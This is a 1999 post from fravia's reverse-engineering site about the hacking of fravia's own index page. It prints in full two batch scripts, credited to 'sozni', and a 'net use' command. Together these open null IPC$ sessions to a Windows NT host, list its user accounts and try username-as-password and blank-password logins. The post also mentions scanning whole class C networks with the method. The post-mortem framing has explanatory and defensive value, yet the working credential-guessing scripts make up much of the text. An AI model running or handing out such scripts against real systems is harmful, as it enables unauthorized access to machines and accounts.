fravia's index page hacked on 1 October 1999
courtesy of fravia's pages of reverse engineering
(published at fravia's in October 1999)
Well, on 01 October 1999 sortof succeded in hacking my front page and substituted my
index.htm with this page.
The hack was possible because my username/password combination (against
better wisdom... "he does'nt practice what he's teaching" :-( were both 8 character
long (an old tradition I am now completely ridden of :-)
In these cases you can succesfully attack a NT box using following
scripts (courtesy of our NT-expert
The hack wasn't as elegant as may seem. The attacker took
a simple batch file .sozni wrote that tries to connect to an
NT box using
username/username then username/"".
The attacker just ran the following batch file on my host
and it gave him a login.
Then he just did this at a command prompt:
net use \\<your ip>\IPC$ /user:<username> <password>
in case you are interested,
here is the text for sozni's 2 batch files
(which requires another file: lsuser.exe
to work properly):
@echo Connecting to \\%1...
@net use \\%1\IPC$ "" /user:""
@nbtstat -A %1
@echo Retrieving list of users...
@lsuser -h\\%1 -n > %1.users
@echo Checking passwords...
@net use \\%1\IPC$ /delete
@FOR /F "skip=2" %%a IN (%1.users) DO @For %%b IN (%%a "") DO @(test2.bat %1 %%a %%b)
@del /f %1.users
@echo Trying to login using %2/%3
@net use \\%1\IPC$ /user:%2 %3 && Net use \\%1\IPC$ /delete
You just run Test <ip> and it gets usernames and tries
two passwords then moves on.
Very simple but you wouldn't believe how many thousands of
times this works (even on some very big companies).
.sozni usually combines this with a little util +greythorne
wrote for him in oredr to scan a whole class C network.
Some better and more complete material can
be found on some of the documents by Rhino9.
If you want to visit activeX wizard
sozni's page, go ahead.
Is reverse engineering illegal?